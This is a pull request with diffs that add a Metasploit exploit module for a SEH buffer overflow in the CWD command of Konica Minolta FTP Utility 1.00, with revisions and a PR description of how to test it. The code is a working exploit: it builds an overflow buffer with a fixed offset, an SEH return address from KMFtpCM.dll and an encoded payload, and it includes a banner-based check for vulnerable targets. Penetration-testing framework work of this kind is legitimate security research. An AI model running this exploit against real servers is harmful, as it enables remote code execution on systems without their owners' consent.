### PR TITLE
Add Konica Minolta FTP Utility 1.00 CWD command module

### DIFF
--- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
+++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
@@ -1,0 +1,74 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'           => 'Konica Minolta FTP Utility 1.0 Post Auth CWD Command SEH Overflow',
+      'Description'    => %q{
+          This module exploits a SEH overflow in Konica Minolta FTP Server 1.0.
+        Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
+        leads to a SEH overflow.  EasyFTP allows anonymous access by default; valid
+        credentials are typically unnecessary to exploit this vulnerability.
+      },
+      'Author'         =>
+        [
+          'Shankar Damodaran', # Stack Overflow DOS P.O.C version
+          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # SEH overflow, metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EBD-ID', '' ],
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 3000,
+          'BadChars' => "\x00\x0a\x2f\x5c",
+          'DisableNops' => true
+        },
+      'Platform'	 => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows 7 SP1 x86',  { 'Ret' => 0x12206d9d, 'Offset' => 1037 } ], # ppr - KMFtpCM.dll
+        ],
+      'DisclosureDate' => 'August 23 2015',
+      'DefaultTarget' => 0))
+  end
+
+  def check
+    connect
+    disconnect
+
+    if (banner =~ /FTP Utility FTP server \(Version ([\d.]+)\)/)
+      return Exploit::CheckCode::Detected
+    end
+      return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    connect_login
+
+    buf = rand_text(target['Offset'])
+    buf << generate_seh_record(target.ret)
+    buf << payload.encoded
+    buf << rand_text(3000)
+
+    print_status("Sending exploit buffer...")
+    send_cmd( ['CWD', buf] , false) # this will automatically put a space between 'CWD' and our attack string
+
+    handler
+    disconnect
+  end
+
+end

--- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
+++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
@@ -13,32 +13,32 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-                      'Name'           => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
-      'Description'    => %q{
+      'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
+      'Description' => %q{
           This module exploits a SEH overflow in Konica Minolta FTP Server 1.00.
         Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
         leads to a SEH overflow.  Konica FTP allows anonymous access by default; valid
         credentials are typically unnecessary to exploit this vulnerability.
       },
-      'Author'         =>
+      'Author' =>
         [
-          'Shankar Damodaran', # stack overflow dos p.o.c
+          'Shankar Damodaran', # stack buffer overflow dos p.o.c
           'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
+      'License' => MSF_LICENSE,
+      'References' =>
         [
-          [ 'EBD-ID', '37908' ],
+          [ 'EBD-ID', '37908' ]
         ],
-      'Privileged'     => false,
-      'Payload'        =>
+      'Privileged' => false,
+      'Payload' =>
         {
-          'Space'    => 1500,
+          'Space' => 1500,
           'BadChars' => "\x00\x0a\x2f\x5c",
           'DisableNops' => true
         },
-      'Platform'	 => 'win',
-      'Targets'        =>
+      'Platform' => 'win',
+      'Targets' =>
         [
           [
             'Windows 7 SP1 x86',
@@ -46,9 +46,9 @@ class Metasploit3 < Msf::Exploit::Remote
               'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
               'Offset' => 1037
             }
-          ],
+          ]
         ],
-      'DisclosureDate' => 'August 23 2015',
+      'DisclosureDate' => 'Aug 23 2015',
       'DefaultTarget' => 0))
   end
 
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
     connect
     disconnect
 
-    if (banner =~ /FTP Utility FTP server/)
+    if banner =~ /FTP Utility FTP server/
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -72,10 +72,9 @@ class Metasploit3 < Msf::Exploit::Remote
     buf << rand_text(3000)
 
     print_status("Sending exploit buffer...")
-    send_cmd( ['CWD', buf] , false) # this will automatically put a space between 'CWD' and our attack string
+    send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
 
     handler
     disconnect
   end
-
 end

--- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
+++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
@@ -28,8 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License' => MSF_LICENSE,
       'References' =>
         [
-          [ 'EBD', '37908' ],
-          [ 'URL', 'https://www.exploit-db.com/exploits/37908/' ]
+          [ 'EBD', '37908' ]
         ],
       'Privileged' => false,
       'Payload' =>

--- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
+++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
@@ -28,7 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'License' => MSF_LICENSE,
       'References' =>
         [
-          [ 'EBD', '37908' ]
+          [ 'EBD', '37908' ],
+          [ 'URL', 'https://www.exploit-db.com/exploits/37908/' ]
         ],
       'Privileged' => false,
       'Payload' =>

--- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
+++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
@@ -13,34 +13,40 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-                      'Name'           => 'Konica Minolta FTP Utility 1.0 Post Auth CWD Command SEH Overflow',
+                      'Name'           => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
       'Description'    => %q{
-          This module exploits a SEH overflow in Konica Minolta FTP Server 1.0.
+          This module exploits a SEH overflow in Konica Minolta FTP Server 1.00.
         Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
-        leads to a SEH overflow.  EasyFTP allows anonymous access by default; valid
+        leads to a SEH overflow.  Konica FTP allows anonymous access by default; valid
         credentials are typically unnecessary to exploit this vulnerability.
       },
       'Author'         =>
         [
-          'Shankar Damodaran', # Stack Overflow DOS P.O.C version
-          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # SEH overflow, metasploit module
+          'Shankar Damodaran', # stack overflow dos p.o.c
+          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'EBD-ID', '' ],
+          [ 'EBD-ID', '37908' ],
         ],
       'Privileged'     => false,
       'Payload'        =>
         {
-          'Space'    => 3000,
+          'Space'    => 1500,
           'BadChars' => "\x00\x0a\x2f\x5c",
           'DisableNops' => true
         },
       'Platform'	 => 'win',
       'Targets'        =>
         [
-          [ 'Windows 7 SP1 x86',  { 'Ret' => 0x12206d9d, 'Offset' => 1037 } ], # ppr - KMFtpCM.dll
+          [
+            'Windows 7 SP1 x86',
+            {
+              'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
+              'Offset' => 1037
+            }
+          ],
         ],
       'DisclosureDate' => 'August 23 2015',
       'DefaultTarget' => 0))
@@ -50,10 +56,11 @@ class Metasploit3 < Msf::Exploit::Remote
     connect
     disconnect
 
-    if (banner =~ /FTP Utility FTP server \(Version ([\d.]+)\)/)
+    if (banner =~ /FTP Utility FTP server/)
       return Exploit::CheckCode::Detected
-    end
+    else
       return Exploit::CheckCode::Safe
+    end
   end
 
   def exploit

--- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
+++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License' => MSF_LICENSE,
       'References' =>
         [
-          [ 'EBD-ID', '37908' ]
+          [ 'EBD', '37908' ]
         ],
       'Privileged' => false,
       'Payload' =>
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
     connect
     disconnect
 
-    if banner =~ /FTP Utility FTP server/
+    if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe


### PR DESCRIPTION
# Add Konica Minolta FTP Utility 1.00 CWD command SEH overflow exploit module.

This module exploits a SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to a SEH overflow.  Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.
- homepage: http://www.konicaminolta.com/
- Source: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
- Tested on: Konica Minolta FTP Utility 1.00 (Windows 7 SP1 x86)
- Usage:
  - Unzip ftpu_10.zip
  - Run FTPUtilitySetup.exe to install
  - run exploit module

![kmftp_metasploit](https://cloud.githubusercontent.com/assets/4267222/9432311/b69bb320-4a53-11e5-8ec8-6214b94d40fc.png)
